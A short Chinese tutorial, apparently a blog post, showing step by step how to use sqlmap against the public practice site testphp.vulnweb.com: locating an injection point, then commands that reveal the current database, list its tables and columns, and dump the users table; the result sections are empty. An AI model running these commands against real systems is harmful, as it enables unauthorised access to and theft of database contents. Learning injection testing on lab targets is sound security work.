1、搭建Python 2.7.X 和SQLmap环境;
2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;
3、使用sqlmap 获取当前数据库名称
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db
运行结果如下:
4、使用sqlmap 列表名
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --table -D acuart
运行结果如下:
5、使用sqlmap 列字段名称
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T users -D acuart -v 0
运行结果如下:
6、使用sqlmap 获取字段内容
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T users -D acuart -v 0
运行结果如下:
时间: 2024-10-05 04:41:14